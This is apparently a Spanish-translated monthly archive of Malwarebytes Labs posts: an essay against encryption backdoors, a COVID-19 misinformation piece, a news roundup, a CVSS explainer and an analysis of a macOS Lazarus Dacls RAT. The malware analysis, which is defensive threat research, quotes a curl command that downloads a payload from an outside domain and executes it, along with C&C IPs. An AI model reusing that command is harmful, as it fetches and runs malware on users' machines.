Archivo mensual mayo 2020

Pormalwarebytes

Oscurecimiento: cifrado y aplicación de la ley

Oscurecimiento: cifrado y aplicación de la ley

Oscurecimiento: cifrado y aplicación de la ley

Al corriente: por 
Última actualización:

ACTUALIZACIÓN, 22/05/2020: en el advenimiento de la Ley EARN IT , el debate sobre la subversión gubernamental del cifrado se ha reavivado. Dado que las condiciones materiales de la tecnología no han cambiado y los argumentos dados a favor del proyecto de ley no son novedosos, hemos decidido volver a publicar el siguiente blog que describe nuestra postura sobre el tema.

Publicado originalmente el 25 de julio de 2017

Lo estamos escuchando mucho últimamente: el cifrado es un obstáculo insuperable entre la aplicación de la ley y mantenernos a salvo. No pueden reunir información sobre terroristas porque usan encriptación. No pueden condenar a los delincuentes porque no entregarán las claves de cifrado. No pueden evitar que sucedan cosas malas porque los malos no desbloquearán sus teléfonos. Por lo tanto, estrictamente para mantenernos a salvo, la industria de la tecnología debe proporcionarles medios para debilitar, eludir o subvertir el cifrado, todo por el bien público. No hay «puertas traseras», fíjate; simplemente quieren una forma de cifrado que funcione para las personas buenas, pero no está mal. Esto es una tontería peligrosa, por muchas razones.

1. Es técnicamente incorrecto

El cifrado mantiene su valor al proporcionar una protección de datos de extremo a extremo, así como lo que llamamos «datos en reposo». Los gobiernos han solicitado ambos medios para observar datos en tránsito, así como para recuperar datos en reposo en dispositivos de interés. También insisten en que no tienen interés en debilitar el cifrado en su conjunto, sino en recuperar la información que necesitan para una investigación. Desde una perspectiva técnica, esto es un galimatías contradictorio. Un algoritmo de cifrado codifica datos confidenciales o no lo hace: el único método para permitir que un tercero obtenga acceso a datos de texto sin formato sería proporcionarles las claves privadas de los comunicantes en cuestión o mantener una falla explotable en el algoritmo que un tercero podría aprovechar. A pesar de las protestas del gobierno en sentido contrario, esto tiene sentido intuitivo:Los algoritmos no pueden discernir buenas intenciones, por lo que deben estar seguros contra todos.

2. Tienen una miríada de otras opciones para obtener lo que necesitan

Supongamos por un momento que una entidad gubernamental tiene una sospecha razonable de que se ha cometido un delito, una certeza razonable de que cierta persona lo cometió y una sospecha razonable de que la evidencia que conduce a una condena se encuentra en un dispositivo cifrado. Históricamente, las entidades gubernamentales no han marcado todas estas casillas antes de intentar subvertir el descifrado, pero de momento les daremos el beneficio de la duda. Las opciones disponibles para varios niveles de aplicación de la ley y / o inteligencia incluyen, pero no se limitan a:

  • Escuchar a escondidas las comunicaciones no cifradas o mal configuradas del contacto de un sospechoso
  • Recopilación de metadatos no cifrados para caracterizar los datos cifrados
  • Detener al sospechoso indefinidamente hasta que descifren el dispositivo «voluntariamente»
  • Geolocalización para ubicar al sospechoso cerca del crimen
  • Análisis de enlaces para colocar al sospechoso en contacto social con delincuentes confirmados
  • Obtener datos no cifrados en reposo de terceros proveedores que cumplen con los requisitos
  • Escuchar a escondidas en otros canales donde el sospechoso describe los datos cifrados
  • Descifrado de llave

Dada la gran variedad de herramientas disponibles para las autoridades, ¿por qué necesitarían comenzar una investigación rompiendo la única herramienta disponible para el usuario promedio que mantiene sus datos a salvo de los piratas informáticos?

3. No están realmente «oscureciendo»

En 1993, el gobierno propuso un dispositivo criptográfico llamado » chip clipper » para encriptar los datos mientras mantiene las claves privadas en un «depósito de claves» controlado por la policía. En lugar de romper el cifrado, la policía simplemente habría tenido disponible una clave de descifrado. Para todo el mundo. Un análisis académico de por qué esta fue una idea increíblemente mala se puede encontrar aquí .

Dado que este programa se cerró en respuesta a una opinión pública abrumadoramente negativa, ¿las agencias de aplicación de la ley y de inteligencia no han podido recopilar datos durante los últimos 24 años? ¿O han recurrido a otras herramientas de investigación disponibles para ellos, según corresponda?

4. Si les damos una puerta trasera, ¿qué harían con ella?

Las tácticas de mano dura de estilo 1984 son poco probables en la actualidad, pero ¿una violación del gobierno que resulta en la pérdida de control de la puerta trasera? Mucho más probable. La violación en OPM  probablemente puso en peligro la información de hasta un tercio de los estadounidenses adultos, dependiendo de quién y cómo cuenta. (No lo sabemos con certeza porque el gobierno no dijo cómo contaban). Esa violación involucró datos de empleados gubernamentales sensibles y valiosos. ¿Lo harían mejor con una puerta trasera que impacta la tecnología utilizada por casi todos?

No , no lo  harían .

Echemos un vistazo a cómo protegen sus propias redes, publiquen OPM. Oh querido …

Si el gobierno más poderoso y rico del mundo no puede asegurar sus propios datos clasificados, ¿por qué deberíamos confiar en ellos con los nuestros? El ex jefe del FBI una vez pidió una «conversación de adultos» sobre el cifrado. Estamos de acuerdo. Así que aquí hay una modesta contrapropuesta:

  • Deje de clasificar en exceso la inteligencia de amenazas cibernéticas. La comunidad de seguridad no puede arreglar lo que no sabe. La inteligencia de amenazas de más de un año no tiene ningún valor.
  • Enviar expertos en la materia para participar en los ISAC , no en «enlaces».
  • Colaborar en los ISAC de buena fe: la inteligencia compartida debe tener contexto y la colaboración debe extenderse más allá de las listas de COI.
  • Comercio analítico de intercambio: los analistas en el gobierno a menudo usan técnicas que, aunque oscuras, no se clasifican. Esto mejorará el comercio en ambos lados.
  • Cumpla con el estándar DHS para asegurar sus propias máquinas, clasificadas o no. Nadie confiaría en alguien con un depósito de claves si esas claves se mantienen en un colador con fugas.

Creemos que estas son solicitudes razonables que pueden ayudar a mantener a las personas seguras, sin romper el cifrado en el que el mundo depende a diario para hacer negocios, mantener conversaciones privadas y, en ocasiones, expresar pensamientos sin temor a represalias.

Pormalwarebytes

Cuando ataca la infodemia de coronavirus

Cuando ataca la infodemia de coronavirus

Cuando ataca la infodemia de coronavirus

Al corriente: por 

Los sitios de redes sociales están intensificando sus esfuerzos en la guerra contra la desinformación … específicamente, la infodemia coronavirus / COVID-19 . Hay una corriente aparentemente interminable de información errónea potencialmente peligrosa que circula en línea relacionada con la pandemia COVID-19, y que podría tener resultados fatales.

Es una ciudad en auge en la tierra de las noticias falsas que se encuentra en lo alto de la ola de personas que se quedan con sus dispositivos tecnológicos las 24 horas, los 7 días de la semana. Yo mismo veo regularmente todo lo publicado en línea desde «gel de manos es un inmunizador» (no) y «los niños no pueden verse afectados» (no es cierto) a «las reglas del Reino Unido significan que los sobrevivientes de abuso doméstico deben permanecer con su cónyuge abusivo» (absolutamente no cierto en absoluto y muy peligroso de reclamar). 

Incluso tenemos ingenieros que están siendo escupidos gracias a las teorías de conspiración 5G que potencialmente resultan en la transmisión del coronavirus . Resulta que una pandemia global es un pararrayos para empujar a las personas a teorías de conspiración en abundancia, en la medida en que algunas personas tienen que ir a buscar guías para alejar a sus familiares de las falsificaciones de Internet . Hay graves consecuencias tomando forma, a través de todas las fuentes imaginables, no importa cuán desconcertante .

¿Qué se está haciendo para abordar estos cuentos en línea?

Youtube : Comenzamos con el monolito de video, eliminando múltiples videos de «Coronavirus causados ​​por 5G» (uno de los cuales tenía más de 1.5 millones de visitas) después de una investigación realizada por PressGazette . Algunos de los otros clips sobre Bill Gates, los medios de comunicación y temas relacionados pertenecían a un gran número de cuentas verificadas, a menudo con anuncios superpuestos de anunciantes que no querían que sus promociones estuvieran asociadas con dicho contenido. Si bien YouTube afirma haber eliminado miles de videos «desde principios de febrero», el gigante de los videos y muchos otros están bajo una intensa presión para llevar las cosas a un nivel superior .

Si bien los principales resultados de búsqueda para el «coronavirus 5G» en YouTube actualmente recuperan una variedad de fuentes verificadas que desacreditan las muchas afirmaciones de conspiración, filtrar videos por lo que se publicó «hoy» da como resultado una variedad de clips recién subidos de personas que filman torres 5G y etiquetan ellos con «Coronavirus» en los títulos. Si ve algo que impulsa específicamente una teoría de la conspiración, las opciones de informe siguen siendo bastante genéricas:

  • Contenido sexual
  • Contenido violento o repulsivo
  • Contenido odioso o abusivo
  • Actos nocivos o peligrosos.
  • Spam o engañoso

Si bien es probable que seleccione la última opción, todavía no hay nada específicamente sobre la pandemia en sí. Esto puede ser preocupante, considerando un estudio reciente de BMJ Global Health que encontró que uno de cada cuatro de los videos más populares sobre la pandemia contenía información errónea . Lo que parece es 62 millones de vistas en 19 videos dudosos de 69 videos populares de un solo día. Es bastante preocupante.

Twitter: este es interesante, ya que Twitter está buscando marcar Tweets y / o cuentas que envíen información incorrecta en relación con COVID-19 . Si bien este es un buen movimiento, parece ser algo hecho completamente al final; Si intenta marcar un Tweet usted mismo como información errónea COVID-19, no hay opción para hacerlo en la pestaña de informes. «Es sospechoso o spam» y «Es abusivo o dañino» son los más cercanos, pero no hay nada específico en las opciones de seguimiento vinculadas a cualquiera de esas selecciones.

Esto se siente un poco como una oportunidad perdida, aunque habrá razones por las cuales esto no está disponible como una opción. Tal vez anticipan informes falsos de bandera y troll de datos válidos, aunque uno esperaría que sus procesos internos para marcar contenido incorrecto pudieran contrarrestar esta posibilidad.

Facebook: El gigante de las redes sociales fue criticado en abril por su enfoque de la crisis de desinformación, con grandes conteos de visitas, contenido inadecuado no marcado como falso y hasta 22 días para emitir advertencias, liderando a un director de campaña de un activista financiado por crowdfunding grupo para afirmar que estaban «en el epicentro de la crisis de desinformación».

Ay.

Facebook decidió comenzar a notificar a los usuarios que habían interactuado con lo que se puede llamar de manera confiable «lo malo» para intentar rechazar el contenido que abunda en grupos y en otros lugares . Facebook continúa abordando el problema con múltiples iniciativas que incluyen abordar los anuncios malos, vincular a las personas con información creíble y combatir datos falsos en múltiples aplicaciones. Sin embargo, el gran tamaño de su base de usuarios sugiere que esta lucha está lejos de terminar.

TikTok: Pensando que las teorías de conspiración y la información errónea no aparecerían en la música viral / sensación de clip TikTok es probablemente una mala idea. En algunos casos, floreció en la plataforma, lejos de los ojos de investigadores serios, todavía enfocados en las grandes plataformas de redes sociales como Twitter y Facebook.

Si bien TikTok es algo único en lo que respecta a tener la información errónea COVID-19 como una categoría específica de informes , no ha sido exactamente una simple navegación. Aparentemente, las categorías de hashtag populares tienen más que su parte justa de contenido inadecuado , vinculando datos incorrectos y afirmaciones mal obtenidas de canciones geniales y fragmentos de sonido rápidos.

Internet Archive: incluso el Internet Archive no está a salvo de las travesuras de coronavirus, ya que las personas usan páginas guardadas para continuar difundiendo enlaces malos en línea. Incluso si un sitio malo se elimina, se marca como dañino o se elimina de los motores de búsqueda, el acto de sacarlo y colocarlo en Archive.org para siempre es una forma de que las personas detrás de los sitios sigan presionando esos enlaces . Por su parte, Internet Archive está luchando con mensajes de advertencia claros sobre algunos de los contenidos desacreditados.

Cuidado con una segunda ola de Infodemic

Aunque algunas de las principales plataformas en línea tardaron en responder a la ola de información falsa, la mayoría de ellas ahora parecen tener al menos algún tipo de plan de juego. Es discutible cuánto está funcionando, pero es probable que algo sea mejor que nada y las tácticas continúan evolucionando en respuesta a esas travesuras digitales.

Sin embargo, parece que al menos algunas advertencias de la actual llamada Infodemic no se tuvieron en cuenta durante muchos años y ahora estamos cosechando el torbellino. Desde los gobiernos y las organizaciones de atención médica hasta el público en general y las plataformas de intercambio de contenido en línea, todos hemos quedado atrapados en la retaguardia en varios grados. Si bien el genio actual está fuera de la botella y no volverá pronto , depende de todos nosotros pensar cómo podríamos hacerlo mejor la próxima vez, porque definitivamente habrá una próxima vez.

Pormalwarebytes

Una semana en seguridad informática (11 de mayo – 17 de mayo)

Una semana en seguridad (11 de mayo - 17 de mayo)

Una semana en seguridad informática (11 de mayo – 17 de mayo)

Al corriente: por 

La semana pasada en Malwarebytes Labs, explicamos por qué RevenueWire tiene que pagar $ 6.7 millones para liquidar los cargos de la FTC , cómo funciona CVSS: caracterizar y puntuar vulnerabilidades , y hablamos sobre cómo y por qué los piratas informáticos atacaron a una importante firma de abogados con ransomware Sodinokibi .

También lanzamos otro episodio de nuestro podcast Lock and Code , esta vez hablando con Chris Boyd, analista principal de inteligencia de malware en Malwarebytes, sobre la tecnología de reconocimiento facial: su historia temprana, sus fallos probados en la precisión y si mejorar la tecnología en realidad sería » bueno ”para la sociedad.

Otras noticias de ciberseguridad

  • Se reveló un nuevo método de ataque que apunta a dispositivos con un puerto Thunderbolt , lo que permite un malvado ataque de mucama. (Fuente: SecurityWeek)
  • A casi cuatro millones de usuarios de MobiFriends , una popular aplicación de citas de Android, los hackers les han robado sus datos personales y de inicio de sesión. (Fuente: IT Security Guru)
  • Cognizant estima que el ataque de ransomware de abril que afectó a su red interna le costará a la empresa de servicios de TI entre $ 50 y $ 70 millones. (Fuente: GovInfoSecurity)
  • La base de datos para el difunto foro de piratas informáticos WeLeakData se vende en la web oscura y expone las conversaciones privadas de los piratas informáticos que utilizaron el sitio. (Fuente: BleepingComputer)
  • El gobierno de los Estados Unidos divulgó información sobre tres nuevas cepas de malware utilizadas por hackers norcoreanos patrocinados por el estado . (Fuente: The Hacker News)
  • Se publicaron detalles sobre PrintDemon , una vulnerabilidad en el servicio de impresión de Windows que afecta a todas las versiones de Windows que se remontan a Windows NT 4. (Fuente: ZDNet)
  • Las agencias de inteligencia de EE. UU. Expresaron la necesidad de una campaña concertada para parchear las 10 vulnerabilidades más explotadas . (Fuente: CBR en línea)
  • Magellan Health , la compañía de seguros Fortune 500, ha informado de un ataque de ransomware y una violación de datos. (Fuente: ThreatPost)
  • Los investigadores encontraron un nuevo marco de ciberespionaje llamado Ramsay , desarrollado para recolectar y filtrar archivos confidenciales de redes con espacios de aire. (Fuente: DarkReading)
  • El EFF llamó la atención sobre las muchas formas en que la Ley EARN IT sería un desastre para la libertad de expresión y seguridad de los usuarios de Internet. (Fuente: Electronic Frontier Foubndation)
Pormalwarebytes

Cómo funciona CVSS: caracterizando y puntuando vulnerabilidades

Cómo funciona CVSS: caracterizando y puntuando vulnerabilidades

Cómo funciona CVSS: caracterizando y puntuando vulnerabilidades

Al corriente: por 
Última actualización:

El Sistema de puntuación de vulnerabilidad común (CVSS) proporciona a los desarrolladores de software, evaluadores y profesionales de seguridad y TI un proceso estandarizado para evaluar vulnerabilidades. Puede usar el CVSS para evaluar el nivel de amenaza de cada vulnerabilidad y luego priorizar la mitigación en consecuencia.

Este artículo explica cómo funciona el CVSS, incluida una revisión de sus componentes, y describe la importancia de utilizar un proceso estandarizado para evaluar las vulnerabilidades.

¿Qué es una vulnerabilidad de software?

Una vulnerabilidad de software es cualquier debilidad en la base de código que puede ser explotada. Las vulnerabilidades pueden ser el resultado de una variedad de errores de codificación, que incluyen lógica defectuosa, mecanismos de validación inadecuados o falta de protección contra desbordamientos del búfer. Las API desprotegidas y los problemas aportados por bibliotecas de terceros también son fuentes comunes de vulnerabilidades.

Independientemente de la fuente de la vulnerabilidad, todos presentan algún riesgo para los usuarios y las organizaciones. Hasta que se descubren vulnerabilidades y parches , o se fijan en una actualización de software, los atacantes pueden explotar a dañar los sistemas, cortes de causa, robar datos, o implementar y malware propagación.

Cómo se informan las vulnerabilidades

La forma en que se informan las vulnerabilidades depende del tipo de software en el que se descubren y del tipo de vulnerabilidad que parecen ser. Además, la importancia percibida de la vulnerabilidad para el buscador es un factor en cómo se informa.

Por lo general, los investigadores de seguridad, los probadores de penetración y los propios usuarios encuentran e informan vulnerabilidades. Los investigadores de seguridad y los probadores de penetración pueden trabajar a tiempo completo para las organizaciones o pueden funcionar como autónomos que trabajan bajo un programa de recompensas de errores .

Cuando las vulnerabilidades son menores o el usuario puede solucionarlas fácilmente sin la ayuda del proveedor o de la comunidad, es más probable que los problemas no se notifiquen. Del mismo modo, si un investigador de sombrero negro o un ciberdelincuente descubre un problema grave , es posible que no se informe. En general, sin embargo, las vulnerabilidades se informan a las organizaciones o desarrolladores cuando se encuentran.

Si se encuentra una vulnerabilidad en el software propietario, se puede informar directamente al proveedor oa una organización de supervisión de terceros, como la organización de seguridad sin fines de lucro, MITRE . Si se encuentra uno en el software de código abierto, se puede informar a la comunidad en general, a los gerentes de proyecto o a un grupo de supervisión.

Cuando se informan vulnerabilidades a un grupo como MITRE, la organización asigna al problema un número de identificación y notifica al vendedor o al gerente del proyecto. La parte responsable tiene 30 a 90 días para desarrollar una solución o parchear el problema antes de que la información se haga pública. Esto reduce la posibilidad de que los atacantes puedan explotar la vulnerabilidad antes de que haya una solución disponible.

¿Qué es CVSS?

El Sistema de puntuación de vulnerabilidad común (CVSS) es un conjunto de estándares abiertos y gratuitos. Estos estándares son mantenidos por el Foro de Respuesta a Incidentes y Equipos de Seguridad (FIRST), una organización de seguridad sin fines de lucro. Los estándares usan una escala de 0.0 a 10.0, con 10.0 representando la mayor severidad. La versión más reciente lanzada es CVSS 3.1 , lanzada en junio de 2019.

Estos estándares se utilizan para ayudar a los investigadores de seguridad, usuarios de software y organizaciones de seguimiento de vulnerabilidades a medir e informar sobre la gravedad de las vulnerabilidades. CVSS también puede ayudar a los equipos de seguridad y desarrolladores a priorizar las amenazas y asignar recursos de manera efectiva.

Cómo funciona la puntuación CVSS

La puntuación CVSS se basa en una combinación de varios subconjuntos de puntuaciones. El único requisito para clasificar una vulnerabilidad con un CVSS es completar los componentes de puntaje base. Sin embargo, se recomienda que los reporteros también incluyan puntajes temporales y métricas ambientales para una evaluación más precisa.

El puntaje base del CVSS se evalúa utilizando una subpunta de explotabilidad, una subpunta de impacto y una subpunta de alcance. Estos tres contienen métricas para evaluar el alcance de los ataques, la importancia de los datos y sistemas afectados, y el subpunto del alcance evalúa el impacto del ataque en sistemas aparentemente no afectados.

Puntaje base

El puntaje base está destinado a representar las cualidades inherentes de una vulnerabilidad. Estas cualidades no deberían cambiar con el tiempo ni deberían depender de ambientes individuales. Para calcular el puntaje base, los reporteros deben calcular el compuesto de tres subpuntos.

Puntaje de explotabilidad

El subpunto de explotabilidad mide las cualidades de un componente vulnerable. Estas cualidades ayudan a los investigadores a definir con qué facilidad los atacantes pueden explotar una vulnerabilidad. Este subpunto se compone de las siguientes métricas:

Métrico Medición Escala (de menor a mayor)
Vector de ataque (AV) Qué fácil es para los atacantes acceder a una vulnerabilidad Físico (presencia)
Local (presencia)
Adyacente (redes conectadas)
Red (remota)
Complejidad de ataque (AC) ¿Qué requisitos previos son necesarios para la explotación? Bajo
alto
Privilegios requeridos (PR) El nivel de privilegios necesarios para explotar la vulnerabilidad. Ninguno
Bajo
Alto
Interacción del usuario (UI) Si la explotación requiere acciones de un usuario terciario Binario: ninguno o obligatorio

Puntaje de impacto

El subpunto de impacto mide los efectos que la explotación exitosa tiene en el componente vulnerable. Define cómo se ve afectado un componente en función del cambio de explotación previa a posterior. Este subpunto se compone de las siguientes métricas:

Métrico Medición Escala
Confidencialidad (C) Pérdida de confidencialidad de datos en el componente o sistemas más amplios. Ninguno
Bajo
Alto
Integridad (I) Pérdida de integridad de datos en todo el sistema de componentes. Ninguno
Bajo
Alto
Disponibilidad (A) Pérdida de disponibilidad del componente o sistemas conectados. Ninguno
Bajo
Alto

Alcance de la calificación

El puntaje del alcance mide qué impacto puede tener una vulnerabilidad en componentes distintos al afectado por la vulnerabilidad. Intenta dar cuenta del daño general del sistema que un atacante puede ejecutar explotando la vulnerabilidad reportada. Esta es una puntuación binaria con un alcance que se cambia o no cambia.

Puntuación temporal

La puntuación temporal mide aspectos de la vulnerabilidad de acuerdo con su estado actual como vulnerabilidad conocida. Este puntaje incluye las siguientes métricas:

Métrico Medición Escala (de menor a mayor)
Explotar código de madurez (E) La disponibilidad de herramientas o código que pueden utilizarse para explotar la vulnerabilidad. Prueba de concepto
funcional
no probados
de alta
No definido
Nivel de remediación (RL) El nivel de remediación actualmente disponible para los usuarios Arreglo oficial
Solución
temporal Arreglo temporal No
disponible
No definido
Informe de confianza (RC) El grado de precisión del informe de vulnerabilidad. Desconocido
Razonable
Confirmado
No definido

Métricas ambientales

Las métricas ambientales miden la gravedad de la vulnerabilidad ajustada por su impacto en los sistemas individuales . Estas métricas son personalizaciones de las métricas utilizadas para calcular la puntuación base. Las métricas ambientales son más útiles cuando se aplican internamente por equipos de seguridad que calculan la gravedad en relación con sus propios sistemas.

La importancia de la estandarización.

CVSS proporciona pautas integrales para evaluar vulnerabilidades. Este sistema de puntuación es utilizado por muchos y tiene una amplia gama de aplicaciones. Sin embargo, quizás el aspecto más importante del CVSS es que proporciona un estándar unificado para todas las partes relevantes. La estandarización es crucial al responder a los riesgos y priorizar la mitigación.

Los puntajes CVSS son más que un medio de estandarización. Estos puntajes tienen aplicaciones prácticas y pueden tener un impacto significativo para ayudar a los equipos de seguridad y desarrolladores de productos a priorizar sus esfuerzos. 

Dentro de una organización, los equipos de seguridad pueden usar los puntajes CVSS para asignar eficientemente recursos limitados. Estos recursos pueden incluir capacidades de monitoreo, tiempo dedicado a parches o incluso búsqueda de amenazas para determinar si una vulnerabilidad ya ha sido explotada. Esto es particularmente valioso para equipos pequeños que pueden no tener los recursos necesarios para abordar cada vulnerabilidad.

Los puntajes CVSS también pueden ser útiles para los investigadores de seguridad. Estos puntajes pueden ayudar a resaltar componentes que son especialmente vulnerables o tácticas y herramientas que son particularmente efectivas. Luego, los investigadores pueden aplicar este conocimiento al desarrollo de nuevas prácticas y herramientas de seguridad para ayudar a detectar y eliminar amenazas desde el principio. 

Finalmente, los puntajes de CVSS pueden ser informativos para los desarrolladores y evaluadores en la prevención de vulnerabilidades en primer lugar. Un análisis cuidadoso de las vulnerabilidades de alto rango puede ayudar a los equipos de desarrollo de software a priorizar las pruebas. También puede ayudar a resaltar áreas donde se pueden mejorar las mejores prácticas de seguridad de código. En lugar de esperar hasta que se descubra que su propio producto es vulnerable, los equipos pueden aprender de los errores de otros

Pormalwarebytes

Nueva variante de malware para Mac de Lazarus Dacls RAT distribuida a través de la aplicación Trojanized 2FA

Nueva variante para Mac de Lazarus Dacls RAT distribuida a través de la aplicación Trojanized 2FA

Nueva variante de malware para Mac de Lazarus Dacls RAT distribuida a través de la aplicación Trojanized 2FA

Al corriente: por el 

Esta publicación de blog fue escrita por Hossein Jazi, Thomas Reed y Jérôme Segura.

Recientemente identificamos lo que creemos que es una nueva variante del troyano de acceso remoto Dacls (RAT) asociado con el grupo Lazarus de Corea del Norte, diseñado específicamente para el sistema operativo Mac.

Dacls es una RAT que fue descubierta por Qihoo 360 NetLab en diciembre de 2019 como un troyano de acceso remoto encubierto totalmente funcional dirigido a las plataformas Windows y Linux.

Esta versión de Mac al menos se distribuye a través de una aplicación de autenticación de dos factores troyanada para macOS llamada MinaOTP, utilizada principalmente por hablantes chinos. Similar a la variante de Linux, cuenta con una variedad de características que incluyen ejecución de comandos, administración de archivos, proxy de tráfico y escaneo de gusanos.

Descubrimiento

El 8 de abril, una aplicación sospechosa de Mac llamada «TinkaOTP» fue enviada a VirusTotal desde Hong Kong. No fue detectado por ningún motor en ese momento.

El ejecutable malicioso del bot se encuentra en el directorio «Contents / Resources / Base.lproj /» de la aplicación y pretende ser un archivo nib («SubMenu.nib») mientras es un archivo ejecutable de Mac. Contenía las cadenas «c_2910.cls» y «k_3872.cls», que son los nombres de los archivos de certificado y clave privada que se habían observado anteriormente.

Persistencia

Esta RAT persiste a través de LaunchDaemons o LaunchAgents que toman un archivo de lista de propiedades (plist) que especifica la aplicación que debe ejecutarse después del reinicio. La diferencia entre LaunchAgents y LaunchDaemons es que LaunchAgents ejecuta el código en nombre del usuario conectado, mientras que LaunchDaemon ejecuta el código como usuario root.

Cuando se inicia la aplicación maliciosa, crea un archivo plist con el nombre «com.aex-loop.agent.plist» en el directorio «Library / LaunchDaemons». El contenido del archivo plist está codificado dentro de la aplicación.

 El programa también verifica si «getpwuid (getuid ())» devuelve la identificación de usuario del proceso actual. Si se devuelve una identificación de usuario, crea el archivo plist «com.aex-loop.agent.plist» en el directorio LaunchAgents: «Library / LaunchAgents /».

Figura 1: archivo Plist

El nombre del archivo y el directorio para almacenar el plist están en formato hexadecimal y se agregan juntos. Muestran el nombre de archivo y el directorio al revés.

Figura 2: Directorio y generación de nombre de archivo

Archivo de configuración

El archivo de configuración contiene la información sobre la máquina de la víctima, como Puid, Pwuid, complementos y servidores C&C. El contenido del archivo de configuración se cifra utilizando el algoritmo de cifrado AES.

Figura 3: Cargar config

 Las variantes de Mac y Linux usan la misma clave AES y IV para cifrar y descifrar el archivo de configuración. El modo AES en ambas variantes es CBC.

Figura 4: Clave AES y IV

La ubicación y el nombre del archivo de configuración se almacenan en formato hexadecimal dentro del código. El nombre del archivo de configuración pretende ser un archivo de base de datos relacionado con Apple Store:

«Biblioteca / Caches / Com.apple.appstore.db»

Figura 5: Nombre del archivo de configuración

La función «IntializeConfiguration» inicializa el archivo de configuración con los siguientes servidores C&C codificados.

Figura 6: Inicializar archivo de configuración

El archivo de configuración se actualiza constantemente al recibir comandos del servidor C&C. El nombre de la aplicación después de la instalación es «mina». Mina proviene de la aplicación MinaOTP , que es una aplicación de autenticación de dos factores para macOS.

Figura 7: El archivo de configuración se está actualizando

Bucle principal

Después de inicializar el archivo de configuración, el bucle principal se ejecuta para realizar los siguientes cuatro comandos principales:

  • Cargue la información del servidor C&C desde el archivo de configuración al servidor (0x601)
  • Descargue el contenido del archivo de configuración del servidor y actualice el archivo de configuración (0x602)
  • Cargue la información recopilada de la máquina de la víctima llamando a la función «getbasicinfo» (0x700)
  • Enviar información de latidos (0x900)

Los códigos de comando son exactamente los mismos que Linux.dacls.

Figura 8: lazo principal

Complementos

Esta Mac RAT tiene los seis complementos vistos en la variante de Linux con un complemento adicional llamado «SOCKS». Este nuevo complemento se usa para proxy del tráfico de red de la víctima al servidor C&C.

La aplicación carga los siete complementos al comienzo del bucle principal. Cada complemento tiene su propia sección de configuración en el archivo de configuración que se cargará en la inicialización del complemento.

Figura 9: Complementos cargados

Complemento CMD

El complemento cmd es similar al complemento «bash» en la rata Linux que recibe y ejecuta comandos al proporcionar un shell inverso al servidor C&C.

Figura 10: Complemento Cmd

Complemento de archivo

El complemento de archivo tiene la capacidad de leer, eliminar, descargar y buscar archivos dentro de un directorio. La única diferencia entre la versión de Mac y Linux es que la versión de Mac no tiene la capacidad de escribir archivos (Caso 0).

Figura 11: Complemento de archivo

Complemento de proceso

El complemento de proceso tiene la capacidad de matar, ejecutar, obtener ID de proceso y recopilar información de proceso.

Figura 12: Complemento de proceso

Si se puede acceder al directorio «/ proc /% d / task» de un proceso, el complemento obtiene la siguiente información del proceso donde% d es el ID del proceso:

  • Argumentos de la línea de comando del proceso ejecutando «/ proc /% / cmdline»
  • Nombre, Uid, Gid, PPid del proceso desde el archivo «/ proc /% d / status».

Complemento de prueba

El código para el complemento de prueba entre Mac y Linux es el mismo. Comprueba la conexión a una IP y un puerto especificados por los servidores de C&C.

RP2P plugin

El complemento RP2P es un servidor proxy utilizado para evitar las comunicaciones directas de la víctima a la infraestructura del actor.

Figura 13: P2P inverso

Complemento LogSend

El complemento Logsend contiene tres módulos que:

  • Verificar la conexión al servidor de registro
  • Escanear red (módulo de escáner de gusanos)
  • Ejecutar comandos del sistema a largo plazo
Figura 14: Complemento Logsend

Este complemento envía los registros recopilados mediante solicitudes de publicación HTTP.

Figura 15: Agente de usuario

Una función interesante en este complemento es el escáner de gusanos. El «start_worm_scan» puede escanear una subred de red en los puertos 8291 u 8292. La subred que se escanea se determina en función de un conjunto de reglas predefinidas. El siguiente diagrama muestra el proceso de selección de la subred para escanear.

Figura 16: Exploración de gusanos

Complemento de calcetines

El complemento Socks es el nuevo séptimo complemento agregado a esta Mac Rat. Es similar al complemento RP2P y actúa como intermediario para dirigir el tráfico entre la infraestructura de bot y C&C. Utiliza Socks4 para sus comunicaciones proxy.

Figura 17: Calcetines4

Comunicaciones de red

La comunicación C&C utilizada por This Mac RAT es similar a la variante de Linux. Para conectarse al servidor, la aplicación primero establece una conexión TLS y luego realiza la señalización y finalmente encripta los datos enviados a través de SSL utilizando el algoritmo RC4.

Figura 18: Tráfico generado por la aplicación (.mina)
Figura 19: conexión TLS

Las variantes de Mac y Linux usan la biblioteca WolfSSL para las comunicaciones SSL. WolfSSL es una implementación de código abierto de TLS en C que admite múltiples plataformas. Esta biblioteca ha sido utilizada por varios actores de amenazas. Por ejemplo, Tropic Trooper usó esta biblioteca en su malware Keyboys .

Figura 20: WolfSSL

Los códigos de comando utilizados para balizar son los mismos que los códigos utilizados en Linux.dacls. Esto es para confirmar la identidad del bot y el servidor.

Figura 21: Beconing

La clave RC4 se genera utilizando una clave codificada.

Figura 22: Inicialización RC4

Variantes y detección

También identificamos otra variante de esta RAT que descarga la carga maliciosa utilizando el siguiente comando curl:

curl -k -o ~ / Library / .mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001> / dev / null 2> & 1 && chmod + x ~ / Library / .mina> / dev / null 2> & 1 && ~ / Library / .mina> / dev

Creemos que esta variante Mac del Dcals RAT está asociada con el grupo Lazarus, también conocido como Hidden Cobra y APT 38, un infame actor de amenaza norcoreano que realiza operaciones de ciberespionaje y cibercrimen desde 2009. 

Se sabe que el grupo es uno de los actores más sofisticados, capaz de crear malware personalizado para apuntar a diferentes plataformas. El descubrimiento de esta RAT de Mac muestra que este grupo APT está desarrollando constantemente su conjunto de herramientas de malware.

Malwarebytes para Mac detecta este troyano de administración remota como OSX-DaclsRAT.

COI

899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53
846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6
216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
loneeaglerecords [.] com / wp-content / uploads / 2020/01 / images.tgz.001 
67.43.239.146
185.62.58.207
50.87.144.227